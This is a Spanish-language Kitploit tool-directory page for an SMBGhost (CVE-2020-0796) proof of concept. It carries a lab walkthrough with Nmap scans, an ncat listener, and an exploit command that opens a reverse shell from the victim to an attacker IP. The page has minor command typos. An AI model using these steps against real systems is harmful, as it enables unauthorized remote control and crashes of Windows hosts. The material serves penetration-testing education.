Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
POC-CVE-2020-0796 — Prueba de concepto del exploit para CVE-2020-0796 (SMBGhost) dirigido a Windows 10/Server SMBv3.1.1. Incluye reconocimiento con Nmap, escaneo de vulnerabilidades y entrega de payload de shell inversa. | Kitploit
Herramientas/GitHubGitHub/hungdnvp/poc-cve-2020-0796
ReconocimientoAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubhungdnvp/poc-cve-2020-0796

POC-CVE-2020-0796

Prueba de concepto del exploit para CVE-2020-0796 (SMBGhost) dirigido a Windows 10/Server SMBv3.1.1. Incluye reconocimiento con Nmap, escaneo de vulnerabilidades y entrega de payload de shell inversa.

Ver Repositorio
2hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

**- Versiones afectadas*

- Windows 10 Version 1903 for 32-bit Systems

- Windows 10 Version 1903 for ARM64-based Systems

- Windows 10 Version 1903 for x64-based Systems

- Windows 10 Version 1909 for 32-bit Systems

- Windows 10 Version 1909 for ARM64-based Systems

- Windows 10 Version 1909 for x64-based Systems

- Windows Server, version 1903 (Server Core installation)

- Windows Server, version 1909 (Server Core installation)

Diagrama de conexión del sistema

image-20240223154022321

Reconocimiento del objetivo

Lanzar Nmap para escanear el rango de red en la zona DMZ

root@kitploit:~
map -sS 192.168.116.0/24

nmap: Es el nombre del programa de escaneo de red**.**

-sS: Selecciona el método de escaneo TCP SYN scan. En este escaneo, Nmap envía un paquete SYN al host de destino y observa la respuesta. Si el host de destino responde con un paquete SYN-ACK, Nmap sabe que el puerto está abierto. Si el host de destino responde con un paquete RST, significa que el puerto está cerrado.

-192.168.116.0/24: La dirección IP o el rango de direcciones IP específico que desea escanear. En este caso, el rango de direcciones es 192.168.116.0/24, que describe todas las direcciones IP desde 192.168.116.1 hasta 192.168.116.254.

image-scanNmap

=> Se observa que la dirección IP de la máquina víctima 192.116.145 tiene el puerto 445 abierto.

· Usar Nmap para escanear vulnerabilidades en la máquina víctima

root@kitploit:~
map -p445 –script smb-protocols 192.168.116.145

nmap: Es el nombre del programa de escaneo de red.

-p445: Especifica el puerto concreto a escanear, en este caso el puerto 445. El puerto 445 se utiliza normalmente para comunicarse con el servicio SMB (Server Message Block) en los sistemas Windows.

--script smb-protocols: Selecciona el script smb-protocols para realizar el escaneo. Este script ayuda a comprobar y mostrar información sobre las versiones del protocolo SMB compatibles en el host de destino.

192.168.116.145: La dirección IP del host que desea escanear. En este caso, la dirección IP configurada es 192.168.116.145

image-sanNmap2

- El resultado obtenido con smb-protocols indica que la máquina víctima podría tener la vulnerabilidad explotable de SMBv3.1.1

- Para estar más seguros, se continúa verificando la posibilidad de explotar la vulnerabilidad CVE-2020-0796 ejecutando el script de Python

[]: -https://github.com/ly4k/SMBGhost "código de explotación"

image-nmapcheck

=> Resultado Vulnerable ->: se detecta que la vulnerabilidad CVE 2020-0796 se puede explotar en la máquina víctima.

Explotación de la vulnerabilidad, instalación de malware y creación de un canal de control remoto

**Llevar a cabo el ataque Reverse_shell**

  • Iniciar una sesión con Netcat a la escucha de la sesión de conexión de la víctima*
root@kitploit:~
ncat -lvp 4444
  • Ejecutar el script de explotación de CVE-2020-0796

[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "código de explotación"

root@kitploit:~
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

image-attack

=> RESULTADO: La máquina atacante toma el control de la ejecución de código shell en la máquina víctima.

image-result

Tras una conexión exitosa, el atacante puede explotar y ejecutar código arbitrario en la máquina víctima con los privilegios de User del usuario de la sesión de conexión.

Al finalizar la sesión, la máquina víctima sufre un error BlueScreen y se reinicia automáticamente.

image-end

*La realización de la explotación puede provocar daños en el sistema objetivo*

Descargar herramienta